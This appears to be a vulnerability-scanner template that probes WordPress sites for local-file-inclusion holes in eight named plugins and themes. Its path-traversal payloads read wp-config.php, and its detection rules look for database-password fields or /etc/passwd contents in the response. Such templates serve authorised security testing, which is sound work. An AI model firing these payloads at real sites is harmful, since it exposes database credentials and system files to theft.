id: wordpress-multiples-lfi
info:
  name: Multiples Wordpress LFI
  risk: High
  confidence: Certain

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'blog, news, docs'

variables:
  - vul: |
      wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
      wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
      wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php
      wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
      wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
      wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
      wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
      wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'DB_USER') && StringSearch("response", 'DB_PASSWORD')
      - >-
        StatusCode() == 200 && StringSearch("response", 'root:') && StringSearch("response", 'bin:x:')
  
# references:
#   - link: https://github.com/
